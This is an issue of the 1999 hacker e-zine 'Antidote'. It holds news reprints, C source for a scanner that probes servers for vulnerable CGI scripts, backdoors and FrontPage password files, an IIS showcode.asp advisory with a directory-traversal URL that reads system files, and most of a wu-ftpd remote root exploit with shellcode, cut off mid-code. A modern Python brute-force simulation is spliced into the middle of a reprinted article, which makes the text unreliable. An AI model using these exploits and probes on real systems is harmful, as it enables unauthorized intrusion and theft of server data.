Volume 2 Issue 3 5/10/99
http://www.thepoison.org/antidote
------------------------------
Here is another issue of Antidote that has been released. Right now we have over 415 subscribers and are getting more and more subscribers every day. We are very sorry to say that we are not going to be sending Antidote as an attachment anymore, because we have gotten so many subscribers that our mail server is going ape shit when we send them (we don't have a mail server just for Antidote). What we are going to start to do is just e-mail everyone the URL as to where they can download the new issue of Antidote. So you will start receiving e-mails about every week telling you that a new issue of Antidote has been released and where you can get it. Sorry if this is an inconvenience to anyone, but it is such a hassle to send this as an attachment because of the mail server. The last issue that we sent as an attachment took us over 2 and a half hours to send to all of the users because of problems, and the mail server kept crashing because of it. At Antidote, we never ask anything from anyone except articles, which are optional, but now, if you could, please visit our sponsor because we have to pay for the domain (www.thepoison.org) and it is getting to be too expensive to keep it up, though we don't want to take it down.
So please take 2 seconds out of your time and please visit: http://www.websponsors.com/cgi-bin/ad_click.cgi?userid=8189&offerid=242

Keep in mind that we are asking 2 seconds of your time to go to our sponsor, while this e-zine took us over a week to write. That's the least you can do. Take 2 seconds and we take a week.

--=\\Contents\\=--
0.00 - Beginning
0.01 - What?
0.02 - FAQ
0.03 - Shouts
0.04 - Writing
1.00 - News & Exploits
1.01 - Army Survival Training
1.02 - Free e-mail isn't Safe?
1.03 - CGIchk
1.04 - IIS 4.0
1.05 - wu-ftpd
1.06 - ippooper
2.00 - Misc
2.01 - Understanding a Computer Virus
2.02 - Dropping Phonelines
2.03 - Cold Fusion Scanner
------------------------------
--=\\0.00\\=--
0.01 --=\\What?\\=--
What is 'Antidote'? Well, we wouldn't say that Antidote is a hacking magazine, because that would be wrong. We don't claim to be a hacking magazine. All Antidote is, basically, is current news and happenings in the underground world. We aren't going to teach you how to hack or anything, but we will supply you with the current information and exploits. Mainly Antidote is just a magazine for people to read if they have some extra time on their hands and are bored with nothing to do. If you want to read a magazine that teaches you how to hack etc., then you might want to go to your local bookstore and see if they carry '2600'.
------------------------------
0.02 --=\\FAQ\\=--
Here are a lot of questions that we seem to receive a lot, or our "Frequently Asked Questions". Please read this before e-mailing us with questions, and if the question isn't on here or doesn't make sense, then you can e-mail us with your question.

> What exactly is "Antidote"?
See section 0.01 for a complete description.

> I find Antidote to not be shot for the beginner or does not teach you the basics, why is that?
Antidote is for everyone; all we are basically is a news ezine that comes out once a week with the current news, exploits, flaws and even programming.
All of the articles that are in here are received second hand (sent to us) and we very rarely edit anyone's articles.

> I just found Antidote issues on your webpage, is there any way I can get them sent to me through e-mail?
Yes, if you go to www.thepoison.org/antidote there should be a text box where you can input your e-mail address. You will receive Antidote the second we release it and it will be sent as an attachment.

> If I want to submit something, are there any 'rules'?
Please see section 0.03 for a complete description.

> If I submitted something, can I remain anonymous?
Yes. Just make sure that you specify what information about yourself you would like to be published above your article (when sending it to us) and we will do what you say.

> I submitted something and I didn't see it in the current/last issue, why is that?
It could be that someone else wrote something similar to what you wrote and they sent it to us first. If you sent us something and we didn't e-mail you back, then you might want to send it again because we probably didn't get it (we respond to all e-mails no matter what). We might use your article in future issues of Antidote.

> Can I submit something that I didn't "discover" or "write"?
Yes you can, we take information that is written by anyone regardless of whether you wrote it or not.

Well that's it for our FAQ. If you have a question that is not on here, or the question is on here and you had trouble understanding it, then please feel free to e-mail lordoak@thepoison.org and he will answer your question. This FAQ will probably be updated every month.
------------------------------
0.03 --=\\Shouts\\=--
These are just some shout outs that we feel we owe to some people. Some are individuals and some are groups in general. If you are not on this list and you feel that for some reason you should be, then please contact Lord Oak and he will post you on here, and we are sorry for the misunderstanding.
Well, here are the shout outs:
Duece
ox1dation
Lord Oak
Forlorn
Altomo
0dnek
PBBSER
HNN [www.hackernews.com]
Thepoison.org
Retribution
403-security.org
EazyMoney

Like we said above, if we forgot you and/or you think you should be added, please e-mail lordoak@thepoison.org and he will be sure to add you.
------------------------------
0.04 --=\\Writing\\=--
As many of you know, we are always open to articles/submissions. We will take almost anything that has to do with computer security. This leaves you open for:
-Protecting the system (security/securing)
-Attacking the system (hacking, exploits, flaws, etc....)
-UNIX (really anything to do with it...)
-News that has to do with any of the above....

The only thing that we really don't take is webpage hacks, like e-mailing us and saying "www.xxx.com" was hacked... But if you have an opinion about the hacks that is fine. If you have any questions about what is "acceptable" and not, please feel free to e-mail Lord Oak [lordoak@thepoison.org] with your question and he will answer it.

Also, please note that if we receive two e-mails with the same topic/idea then we will use the one that we received first. So it might be a good idea to e-mail one of us and ask us if someone has written about/on this topic, so that way you don't waste your time writing something that won't be published. An example of this would be: Joe sends me an e-mail with the topic being hacking hotmail accounts on Thursday, and then Bill sends us an e-mail on hacking hotmail accounts on Sunday; we will take Joe's article because he sent it in first. But keep in mind, we might use your article for the next issue!

If you have something that you would like to submit to Antidote, please e-mail lordoak@thepoison.org or duece@thepoison.org and one of us will review the article and put it in Antidote (if we like it).
------------------------------
http://www.403-security.org
For the latest hacks and news

--=\\1.00\\=--
1.01 --=\\Army Survival Training\\=--
[www.fcw.com]
BY DANIEL VERTON (dan_verton@fcw.com)

SALT LAKE CITY -- The Army this fall plans to offer an online graduate-level training course on information systems survivability, teaching engineers to develop systems capable of surviving any kind of technical glitch and network attack.

The new 14-week Infosurv course will be offered through the University of Maryland as an online, distance-learning initiative sponsored by the Army Research Laboratory in Adelphi, Md. During the course, students with a basic engineering background will build on their education with instruction on reliability, security and performance risks that must be addressed early in the life cycle of an information system.

According to Lt. Col. Paul Walczak, senior computer scientist at the Army Research Laboratory, the concept of Infosurv has been around for about 10 years, growing out of research conducted at the Army Research Laboratory. Survivability, Walczak said, can best be defined as a system's ability to withstand hardware faults, software flaws, network attacks by hackers and electromagnetic interference. When one of these types of failures brings a system or a portion of a system down, the rest of the information infrastructure must be capable of operating, he said.

"This is a serious attempt by the Army Research Lab to institutionalize the concept," Walczak said. Until now, reliability, survivability and security have been features that systems developers have "bolted on" after the development process started, he said. The goal is to build these requirements into the system design before development work begins, he said.
The Army plans to transmit live courses each Thursday from a lecture room on the College Park, Md., campus to as many as 16 satellite locations. "We plan to beam this course out to as many sites as are interested in it," said Walczak, who noted that the University of Tennessee, Pennsylvania State University and Harvard University also have expressed interest in taking part in future courses.

Peter Neumann, principal scientist at the Computer Science Laboratory at SRI International and the principal investigator for Infosurv research, will be the primary instructor for the course. The course will act as the core course in a new four-course masters-level certificate program in survivable systems, and it also can be used as credit toward a regular degree program.

http://www.fcw.com/pubs/fcw/1999/0503/web-army-5-5-99.html
------------------------------
1.02 --=\\Free E-mail isn't safe?\\=--
[comments by Lord Oak]
As we all know, hotmail and yahoo's free e-mail service has had a lot of vulnerabilities and security problems in the past. We know that the vulnerabilities are old, but we thought that this article was a good one to explain the "danger" your e-mail might be in if you use hotmail, yahoo or any other web-based free e-mail.

[www.eurekalert.org]
Free Web-based e-mail services are vulnerable to hackers, according to an analysis by the Internet Security Advisors Group, a consultancy in Severna Park, Maryland. In its security probe, ISAG focused on the three biggest and most firmly established Web-based free e-mail services: Microsoft's Hotmail, YahooMail and Excite Mail. It found that all three failed to provide a basic security feature that helps keep hackers out. The major mistake made by all the service providers was to allow users an unlimited number of attempts to log on, rather than locking them out after a couple of attempts if they got the password wrong.
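The control ISAG found missing, modelled as an added example (this is not part of the article and not code from Hotmail, Yahoo or Excite). The 'unlimited' policy reproduces the flaw: any number of guesses, no delay. The 'escalating' policy is the countermeasure the article goes on to describe for Hotmail, where every wrong password lengthens a per-account delay, and the optional lockout_after threshold is the hard lockout ISAG recommended. The account store, the ten-word list, the fake clock and the attacker model are constructed so the comparison runs offline in an instant.

```python
import hashlib
import hmac
import os
from dataclasses import dataclass


class FakeClock:
    """Constructed clock: the simulation advances it instead of sleeping."""
    def __init__(self):
        self.now = 0.0

    def __call__(self):
        return self.now

    def advance(self, seconds):
        self.now += seconds


@dataclass
class Account:
    salt: bytes
    pw_hash: bytes
    failures: int = 0        # consecutive wrong passwords
    not_before: float = 0.0  # next attempt is accepted only at/after this time


class LoginService:
    """policy='unlimited' is the behaviour ISAG criticised; 'escalating' adds a
    delay that grows with each failure; lockout_after adds a hard lockout."""

    def __init__(self, policy="escalating", base_delay=2.0, lockout_after=None, clock=None):
        self.policy = policy
        self.base_delay = base_delay
        self.lockout_after = lockout_after
        self.clock = clock or FakeClock()
        self.accounts = {}

    @staticmethod
    def _hash(password, salt):
        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 20_000)

    def register(self, user, password):
        salt = os.urandom(16)
        self.accounts[user] = Account(salt, self._hash(password, salt))

    def login(self, user, password):
        """Return (ok, retry_after_seconds). A positive retry_after means the
        attempt was refused before the password was even checked."""
        acct = self.accounts.get(user)
        if acct is None:
            return False, 0.0
        now = self.clock()
        if self.policy == "escalating":
            if self.lockout_after is not None and acct.failures >= self.lockout_after:
                return False, float("inf")  # locked: needs an out-of-band reset
            if now < acct.not_before:
                return False, acct.not_before - now
        ok = hmac.compare_digest(self._hash(password, acct.salt), acct.pw_hash)
        if ok:
            acct.failures = 0     # a correct login is never delayed
            acct.not_before = 0.0
            return True, 0.0
        acct.failures += 1
        if self.policy == "escalating":
            # each consecutive failure pushes the next allowed attempt further out
            acct.not_before = now + self.base_delay * acct.failures
        return False, 0.0


def dictionary_attack(service, user, wordlist):
    """Constructed attacker model: tries each word in order, waiting out any delay.
    Returns (password_found_or_None, attempts_checked, simulated_seconds)."""
    clock = service.clock
    start = clock()
    attempts = 0
    for guess in wordlist:
        while True:
            ok, wait = service.login(user, guess)
            if wait == float("inf"):
                return None, attempts, clock() - start
            if wait > 0:
                clock.advance(wait)
                continue
            attempts += 1
            break
        if ok:
            return guess, attempts, clock() - start
    return None, attempts, clock() - start


# constructed ten-word list; the victim password is the last entry
WORDLIST = ["password", "letmein", "qwerty", "hotmail", "123456",
            "secret", "dragon", "monkey", "football", "baseball"]


def compare_policies():
    """Same wordlist against both policies: {policy: (found, attempts, seconds)}."""
    results = {}
    for policy in ("unlimited", "escalating"):
        svc = LoginService(policy=policy, base_delay=2.0, clock=FakeClock())
        svc.register("alice", "baseball")  # constructed account
        results[policy] = dictionary_attack(svc, "alice", WORDLIST)
    return results
```

With ten guesses the difference is already visible: the unlimited service is cracked in zero simulated seconds, while the escalating delay costs the attacker 2+4+...+18 = 90 seconds for the same ten words, and the cost keeps growing quadratically with the size of the wordlist; a legitimate user who types the right password sees no delay at all.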
This, says Ira Winkler, president of ISAG, makes it possible for hackers to guess a password by brute force, using what is known as an automated dictionary attack, which tries vast numbers of different passwords until the correct one is found. This, Winkler says, is a basic information security issue the service providers should have got right.

In addition, ISAG found that many Web-based e-mail systems also fail to encrypt their passwords when they are sent over the Net, making them easy prey for hackers to intercept. Some hackers collect passwords, logging into e-mail accounts and sending bogus messages.

Last week, Hotmail tightened its security in response to ISAG's findings. Its log-in protocol now incorporates a slight delay when the password is entered. For each wrong attempt the delay increases, making any automated attack take an unfeasibly long time. "There's no impact on members who log in successfully," says Laura Norman, a project manager at Hotmail, "but this should deter potential dictionary attacks." Yahoo has also made changes to its password security system and Excite is believed to be considering the matter.

http://www.eurekalert.org/releases/ns-fes050499.html
------------------------------
1.03 --=\\CGIchk\\=--
This is a CGI scanner that scans over 55 KNOWN cgi vulnerabilities.

/* ---------------------------------------------------------------------- */
/* CGI scanner v1.33, m0dify and recode by su1d sh3ll //UnlG 1999 */
/* Tested on Slackware linux with kernel 2.0.35;2.0.36; */
/* FreeBSD 2.2.2-3.1;IRIX 5.3 */
/* Source c0de by [CKS & Fdisk] */
/* Gr33tz to: Packet St0rm and Ken, ADM crew, ech0 security and CKS, ch4x,*/
/* el8.org users, #c0de, rain.forest.puppy/[WT], MnemoniX , */
/* hypoclear of lUSt */
/* Fuck to: www.hackzone.ru , HDT... CHC fuck u 2 llamaz-scr1pt k1dd1ez */
/* hey! v0rt-fu if u kewl programmer u must write u own proggi, */
/* and stop modify th1s scanner...(i can do it better and CKS ;) */
/* hmm, remember if u can add 2 CGi to scanner u can't change */
/* real Version number and name.....better go read 'C' Bible ;-) */
/* c0m1ng s00n: hmmm.... i forgot 8-) again forgot... :-) */
/* -----------------------------------------------[02:30 04.05.99 UnlG]- */

/* The header names of the #include lines were lost when this issue was
   converted to text; the standard headers the code needs are listed here. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

int main(int argc, char *argv[])
{
    int sock, debugm = 0;
    struct sockaddr_in sin;
    struct hostent *he;
    char foundmsg[] = "200";     /* an HTTP 200 reply means the CGI is present */
    char *cgistr;
    char buffer[1024];
    int count = 0;
    int numin;
    char cgibuff[1024];
    char *buff[100];    /* Don't u think 100 is enought? ;-)*/
    char *cginame[100]; /* Don't u think 100 is enought? */

    /* request strings, one per CGI checked */
    buff[1] = "GET /cgi-bin/unlg1.1 HTTP/1.0\n\n"; /* v0rt-fu when u modify source, check this first line.... that's my 8-) */
    buff[2] = "GET /cgi-bin/rwwwshell.pl HTTP/1.0\n\n";
    buff[3] = "GET /cgi-bin/phf HTTP/1.0\n\n";
    buff[4] = "GET /cgi-bin/Count.cgi HTTP/1.0\n\n";
    buff[5] = "GET /cgi-bin/test-cgi HTTP/1.0\n\n";
    buff[6] = "GET /cgi-bin/nph-test-cgi HTTP/1.0\n\n";
    buff[7] = "GET /cgi-bin/php.cgi HTTP/1.0\n\n";
    buff[8] = "GET /cgi-bin/handler HTTP/1.0\n\n";
    buff[9] = "GET /cgi-bin/webgais HTTP/1.0\n\n";
    buff[10] = "GET /cgi-bin/websendmail HTTP/1.0\n\n";
    buff[11] = "GET /cgi-bin/webdist.cgi HTTP/1.0\n\n";
    buff[12] = "GET /cgi-bin/faxsurvey HTTP/1.0\n\n";
    buff[13] = "GET /cgi-bin/htmlscript HTTP/1.0\n\n";
    buff[14] = "GET /cgi-bin/pfdispaly.cgi HTTP/1.0\n\n";
    buff[15] = "GET /cgi-bin/perl.exe HTTP/1.0\n\n";
    buff[16] = "GET /cgi-bin/wwwboard.pl HTTP/1.0\n\n";
    buff[17] = "GET /cgi-bin/www-sql HTTP/1.0\n\n";
    buff[18] = "GET /cgi-bin/view-source HTTP/1.0\n\n";
    buff[19] = "GET /cgi-bin/campas HTTP/1.0\n\n";
    buff[20] = "GET /cgi-bin/aglimpse HTTP/1.0\n\n";
    buff[21] = "GET /cgi-bin/glimpse HTTP/1.0\n\n";
    buff[22] = "GET /cgi-bin/man.sh HTTP/1.0\n\n";
    buff[23] = "GET /cgi-bin/AT-admin.cgi HTTP/1.0\n\n";
    buff[24] = "GET /cgi-bin/filemail.pl HTTP/1.0\n\n";
    buff[25] = "GET /cgi-bin/maillist.pl HTTP/1.0\n\n";
    buff[26] = "GET /cgi-bin/jj HTTP/1.0\n\n";
    buff[27] = "GET /cgi-bin/info2www HTTP/1.0\n\n";
    buff[28] = "GET /cgi-bin/files.pl HTTP/1.0\n\n";
    buff[29] = "GET /cgi-bin/finger HTTP/1.0\n\n";
    buff[30] = "GET /cgi-bin/bnbform.cgi HTTP/1.0\n\n";
    buff[31] = "GET /cgi-bin/survey.cgi HTTP/1.0\n\n";
    buff[32] = "GET /cgi-bin/AnyForm2 HTTP/1.0\n\n";
    buff[33] = "GET /cgi-bin/textcounter.pl HTTP/1.0\n\n";
    buff[34] = "GET /cgi-bin/classifieds.cgi HTTP/1.0\n\n";
    buff[35] = "GET /cgi-bin/environ.cgi HTTP/1.0\n\n";
    buff[36] = "GET /_vti_pvt/service.pwd HTTP/1.0\n\n";
    buff[37] = "GET /_vti_pvt/users.pwd HTTP/1.0\n\n";
    buff[38] = "GET /_vti_pvt/authors.pwd HTTP/1.0\n\n";
    buff[39] = "GET /_vti_pvt/administrators.pwd HTTP/1.0\n\n";
    buff[40] = "GET /_vti_pvt/shtml.dll HTTP/1.0\n\n";
    buff[41] = "GET /_vti_pvt/shtml.exe HTTP/1.0\n\n";
    buff[42] = "GET /cgi-dos/args.bat HTTP/1.0\n\n";
    buff[43] = "GET /cgi-win/uploader.exe HTTP/1.0\n\n";
    buff[44] = "GET /scripts/issadmin/bdir.htr HTTP/1.0\n\n";
    buff[45] = "GET /scripts/CGImail.exe HTTP/1.0\n\n";
    buff[46] = "GET /scripts/tools/newdsn.exe HTTP/1.0\n\n";
    buff[47] = "GET /scripts/fpcount.exe HTTP/1.0\n\n";
    buff[48] = "GET /cfdocs/expelval/openfile.cfm HTTP/1.0\n\n";
    buff[49] = "GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0\n\n";
    buff[50] = "GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0\n\n";
    buff[51] = "GET /cfdocs/expelval/sendmail.cfm HTTP/1.0\n\n";
    buff[52] = "GET /search97.vts HTTP/1.0\n\n";
    buff[53] = "GET /carbo.dll HTTP/1.0\n\n";
    /* we have at archive about 70 CGi , rule? ;-) */

    /* display names, same index as the request above */
    cginame[1] = "UnlG - backd00r ";
    cginame[2] = "THC - backd00r ";
    cginame[3] = "phf..classic :) ";
    cginame[4] = "Count.cgi ";
    cginame[5] = "test-cgi ";
    cginame[6] = "nph-test-cgi ";
    cginame[7] = "php.cgi ";
    cginame[8] = "handler ";
    cginame[9] = "webgais ";
    cginame[10] = "websendmail ";
    cginame[11] = "webdist.cgi ";
    cginame[12] = "faxsurvey ";
    cginame[13] = "htmlscript ";
    cginame[14] = "pfdisplay ";
    cginame[15] = "perl.exe ";
    cginame[16] = "wwwboard.pl ";
    cginame[17] = "www-sql ";
    cginame[18] = "view-source ";
    cginame[19] = "campas ";
    cginame[20] = "aglimpse ";
    cginame[21] = "glimpse ";
    cginame[22] = "man.sh ";
    cginame[23] = "AT-admin.cgi ";
    cginame[24] = "filemail.pl ";
    cginame[25] = "maillist.pl ";
    cginame[26] = "jj ";
    cginame[27] = "info2www ";
    cginame[28] = "files.pl ";
    cginame[29] = "finger ";
    cginame[30] = "bnbform.cgi ";
    cginame[31] = "survey.cgi ";
    cginame[32] = "AnyForm2 ";
    cginame[33] = "textcounter.pl ";
    cginame[34] = "classifields.cgi";
    cginame[35] = "environ.cgi ";
    cginame[36] = "service.pwd ";
    cginame[37] = "users.pwd ";
    cginame[38] = "authors.pwd ";
    cginame[39] = "administrators ";
    cginame[40] = "shtml.dll ";
    cginame[41] = "shtml.exe ";
    cginame[42] = "args.bat ";
    cginame[43] = "uploader.exe ";
    cginame[44] = "bdir - samples ";
    cginame[45] = "CGImail.exe ";
    cginame[46] = "newdsn.exe ";
    cginame[47] = "fpcount.exe ";
    cginame[48] = "openfile.cfm ";
    cginame[49] = "exprcalc.cfm ";
    cginame[50] = "dispopenedfile ";
    cginame[51] = "sendmail.cfm ";
    cginame[52] = "search97.vts ";
    cginame[53] = "carbo.dll ";

    if (argc < 2) {
        printf("\n [-- CGI Checker 1.33. Modified by su1d sh3ll //UnlG --]");
        printf("\nusage : %s host ", argv[0]);
        printf("\n Or : %s host -d for debug mode\n\n", argv[0]);
        exit(0);
    }
    if (argc > 2) {
        if (strcmp(argv[2], "-d") == 0) {
            debugm = 1;
        }
    }
    if ((he = gethostbyname(argv[1])) == NULL) {
        herror("gethostbyname");
        exit(0);
    }
    printf("\n\n\t [CKS & Fdisk]'s CGI Checker - modify by su1d sh3ll 04.05.99\n\n\n");

    /* first connection: fetch the server banner with a HEAD request */
    sock = socket(AF_INET, SOCK_STREAM, 0);
    bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
    sin.sin_family = AF_INET;
    sin.sin_port = htons(80);
    if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {
        perror("connect");
        exit(1);
    }
    printf("\n\n\t [ Press any key to check out the httpd version...... ]\n");
    getchar(); /* CKS sorry, but ur new piece of code don't work :-( */
    send(sock, "HEAD / HTTP/1.0\n\n", 17, 0);
    memset(buffer, 0, sizeof(buffer));       /* keep the reply NUL-terminated */
    recv(sock, buffer, sizeof(buffer) - 1, 0);
    printf("%s", buffer);
    close(sock);

    printf("\n\t [ Press any key to search 4 CGI stuff...... ]\n");
    getchar();
    while (count++ < 53) /* huh! 53 cgi..... no secur1ty in th1s w0rld ;-)*/
    {
        /* one fresh connection per request (HTTP/1.0, no keep-alive) */
        sock = socket(AF_INET, SOCK_STREAM, 0);
        bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
        sin.sin_family = AF_INET;
        sin.sin_port = htons(80);
        if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {
            perror("connect");
            close(sock);
            continue;
        }
        printf("Searching for %s : ", cginame[count]);
        for (numin = 0; numin < 1024; numin++) {
            cgibuff[numin] = '\0';
        }
        send(sock, buff[count], strlen(buff[count]), 0);
        recv(sock, cgibuff, sizeof(cgibuff) - 1, 0);
        cgistr = strstr(cgibuff, foundmsg);
        if (cgistr != NULL)
            printf("Found !! ;)\n");
        else
            printf("Not Found\n");
        if (debugm == 1) {
            printf("\n\n ------------------------\n %s \n ------------------------\n", cgibuff);
            printf("Press any key to continue....\n");
            getchar();
        }
        close(sock);
    }
    printf("...have a nice hack... ;-)\n");
    return 0;
}

------------------------------
1.04 --=\\IIS 4.0\\=--
[www.l0pht.com]
-Description
Internet Information Server (IIS) 4.0 ships with a set of sample files to help web developers learn about Active Server Pages (ASP). One of these sample files, showcode.asp, is designed to view the source code of the sample applications via a web browser. The showcode.asp file does inadequate security checking and allows anyone with a web browser to view the contents of any text file on the web server. This includes files that are outside of the document root of the webserver. Many ecommerce web servers store transaction logs and other customer information such as credit card numbers, shipping addresses, and purchase information in text files on the web server. This is the type of data that could be accessed with this vulnerability.

The L0pht would like to thank Parcens for doing the initial research on this problem.

-Details
The showcode.asp file is installed by default at the URL:
http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp

It takes 1 argument in the URL, which is the file to view. The format of this argument is:
source=/path/filename

So to view the contents of the showcode.asp file itself the URL would be:
http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/SELECTOR/showcode.asp

This looks like a fairly dangerous sample file. It is meant to only allow the viewing of the sample files which were in the '/msadc' directory on the system. The problem is the security check does not test for the '..' characters within the URL. The only checking done is if the URL contains the string '/msadc/'.
This allows URLs to be created that view not only files outside of the samples directory, but files anywhere on the entire file system that the web server's document root is on. For example, a URL that will view the contents of the boot.ini file, which is in the root directory of an NT system, is:
http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/../../../../../boot.ini

This URL requires that IIS 4.0 was installed in its default location.

-Solution
For production servers, sample files should never be installed, so delete the entire /msadc/samples directory. If you must have the showcode.asp capability on development servers, the showcode.asp file should be modified to test for URLs with '..' in them and deny those requests.

For specific questions about this advisory, please contact weld@l0pht.com
http://www.l0pht.com/advisories.html
------------------------------
1.05 --=\\wu-ftpd\\=--
/*
 * Remote/local exploit for wu-ftpd [12] through [18]
 * gcc w00f.c -o w00f -Wall -O2
 *
 * Offsets/padding may need to be changed, depending on remote daemon
 * compilation options. Try offsets -5000 to 5000 in increments of 100.
 *
 * Note: you need to use -t >0 for -any- version lower than 18.
 * Coded by smiler and cossack
 */

/* The header names of the #include lines were lost when this issue was
   converted to text; the standard headers the code needs are listed here. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <stdarg.h>
#include <unistd.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

/* In a beta[12-17] shellcode_A overflow, we will not see responses to our
   commands. Add option -c (use chroot code) to fix this. */
unsigned char hellcode_a[]=
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /* setuid(0) */
"\xeb\x2c\x5b\x89\xd9\x80\xc1\x06\x39\xd9\x7c\x07\x80\x01\x20"
"\xfe\xc9\xeb\xf5\x89\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c"
"\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0\xfe\xc0\xcd"
"\x80\xe8\xcf\xff\xff\xff\xff\xff\xff"
"\x0f\x42\x49\x4e\x0f\x53\x48";

unsigned char hellcode_b[]=
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /* setuid(0) */
"\xeb\x66\x5e\x89\xf3\x80\xc3\x0f\x39\xf3\x7c\x07\x80"
"\x2b\x02\xfe\xcb\xeb\xf5\x31\xc0\x88\x46\x01\x88\x46"
"\x08\x88\x46\x10\x8d\x5e\x07\xb0\x0c\xcd\x80\x8d\x1e"
"\x31\xc9\xb0\x27\xcd\x80\x31\xc0\xb0\x3d\xcd\x80\x31"
"\xc0\x8d\x5e\x02\xb0\x0c\xcd\x80\x31\xc0\x88\x46\x03"
"\x8d\x5e\x02\xb0\x3d\xcd\x80\x89\xf3\x80\xc3\x09\x89"
"\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c\xb0\x0b\x8d"
"\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0\xfe\xc0\xcd\x80"
"\xe8\x95\xff\xff\xff\xff\xff\xff\x43\x43\x30\x30\x31"
"\x30\x30\x31\x43\x31\x64\x6b\x70\x31\x75\x6a";

char *Fgets(char *s,int size,FILE *stream);
int ftp_command(char *buf,int success,FILE *out,char *fmt,...);
int double_up(unsigned long blah,char *doh);
int resolv(char *hostname,struct in_addr *addr);
void fatal(char *string);
int usage(char *program);
int tcp_connect(struct in_addr host,unsigned short port);
int parse_pwd(char *in,int *pwdlen);
void RunShell(int thesock);

struct type {
    unsigned long ret_address;
    unsigned char align;         /* Use this only to offset \xff's used */
    signed short pad_shift;      /* how little/much padding */
    unsigned char overflow_type; /* whether you have to DELE */
    char *name;
};

/* ret_pos is the same for all types of overflows, you only have to change
   the padding. This makes it neater, and gives the shellcode plenty of room
   for nops etc */
#define RET_POS 190
#define FTPROOT "/home/ftp"

/* the redhat 5.0 exploit doesn't work at the moment...it must be some trite
   error i am overlooking. (the shellcode exits w/ code 0375) */
struct type types[]={
    { 0xbffff340, 3, 60, 0, "BETA-18 (redhat 5.2)", },
    { 0xbfffe30e, 3,-28, 1, "BETA-16 (redhat 5.1)", },
    { 0xb2ffe356, 3,-28, 1, "BETA-15 (redhat 5.0)", },
    { 0xbfffebc5, 3,  0, 1, "BETA-15 (slackware 3.3)", },
    { 0xbffff3b3, 3,  0, 1, "BETA-15 (slackware 3.4)", },
    { 0xbffff395, 3,  0, 1, "BETA-15 (slackware 3.6)", },
    { 0,0,0,0,NULL }
};

struct options {
    char start_dir[20];
    unsigned char *shellcode;
    unsigned char chroot;
    char username[10];
    char password[10];
    int offset;
    int t;
} opts;

/* Bit of a big messy function, but hey, its only an exploit */
int main(int argc,char **argv)
{
    char *argv0,ltr;
    char outbuf[1024], inbuf[1024];
    char ret_string[10]; /* double_up() writes up to 8 bytes plus NUL */
    int pwdlen,ctr,d;
    FILE *cin;
    int fd;
    struct in_addr victim;

    argv0 = strdup(argv[0]);
    *opts.username = *opts.password = *opts.start_dir = 0;
    opts.chroot = opts.offset = opts.t = 0;
    opts.shellcode = hellcode_a;

    while ((d = getopt(argc,argv,"cs:o:t:"))!= -1){
        switch (d) {
        case 'c':
            opts.shellcode = hellcode_b;
            opts.chroot = 1;
            break;
        case 's':
            strncpy(opts.start_dir,optarg,sizeof(opts.start_dir)-1);
            break;
        case 'o':
            opts.offset = atoi(optarg);
            break;
        case 't':
            opts.t = atoi(optarg);
            if ((opts.t < 0)||(opts.t>5)) {
                printf("Dont have that type!\n");
                exit(-1);
            }
        }
    }
    argc -= optind;
    argv += optind;
    if (argc < 3) usage(argv0);
    if (!resolv(argv[0],&victim)) {
        perror("resolving");
        exit(-1);
    }
    /* bounded copies: the fields are only 10 bytes */
    strncpy(opts.username,argv[1],sizeof(opts.username)-1);
    strncpy(opts.password,argv[2],sizeof(opts.password)-1);
    if ((fd = tcp_connect(victim,21)) < 0) {
        perror("connect");
        exit(-1);
    }
    if (!(cin = fdopen(fd,"r"))) {
        printf("Couldn't get stream\n");
        exit(-1);
    }
    Fgets(inbuf,sizeof(inbuf),cin);
    printf("%s",inbuf);
    if (ftp_command(inbuf,331,cin,"USER %s\n",opts.username)<0)
        fatal("Bad username\n");
    if (ftp_command(inbuf,230,cin,"PASS %s\n",opts.password)<0)
        fatal("Bad password\n");
    if (*opts.start_dir)
        if (ftp_command(inbuf,250,cin,"CWD %s\n",opts.start_dir)<0)
            fatal("Couldn't change dir\n");
    if (ftp_command(inbuf,257,cin,"PWD\n")<0)
        fatal("PWD\n");
    if (parse_pwd(inbuf,&pwdlen) < 0)
        fatal("PWD\n");
    srand(time(NULL));
    printf("Making padding directorys\n");
    for (ctr = 0;ctr < 4;ctr++) {
        ltr = rand()%26 + 65;
        memset(outbuf,ltr,194);
        outbuf[194]=0;
        if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0)
            fatal("MKD\n");
        if (ftp_command(inbuf,250,cin,"CWD %s\n",outbuf)<0)
            fatal("CWD\n");
    }
    /* Make padding directory */
    ctr = 124 - (pwdlen - types[opts.t].align); //180
    //ctr = 152 - (pwdlen - types[opts.t].align);
    ctr -= types[opts.t].pad_shift;
    if (ctr < 0) {
        exit(-1);
    }
    memset(outbuf,'A',ctr+1);
    outbuf[ctr] = 0;
    if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0)
        fatal("MKD\n");
    if (ftp_command(inbuf,250,cin,"CWD %s\n",outbuf)<0)
        fatal("CWD\n");
    /* nop sled, shellcode ending at RET_POS, then the return address twice */
    memset(outbuf,0x90,195);
    d=0;
    for (ctr = RET_POS-(int)strlen((char *)opts.shellcode);ctr<(RET_POS);ctr++)
        outbuf[ctr] = opts.shellcode[d++];
    double_up(types[opts.t].ret_address-opts.offset,ret_string);
